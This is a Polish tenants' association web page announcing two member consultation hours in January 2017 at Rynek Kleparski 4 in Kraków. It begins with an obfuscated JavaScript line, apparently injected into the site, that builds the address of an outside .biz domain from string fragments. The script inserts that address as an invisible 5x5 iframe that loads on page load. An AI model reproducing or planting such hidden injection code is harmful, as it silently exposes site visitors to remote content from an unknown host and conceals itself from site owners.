jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); DYŻURY W STYCZNIU
W  styczniu odbędą sie dwa dyżury członków naszego Stowarzyszenia, na które zapraszamy Lokatorów potrzebująvcych informacji i pomocy
 
- 16 stycznia 2017. od  godz. 15 do 16
- 30 stycznia 2017  od  godz. 15 do 16
 
Zapraszamy do siedziby Rady Dzielnicy I przy Rynku Kleparskim 4 (budynek dawnego LOT-u), II piętro

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.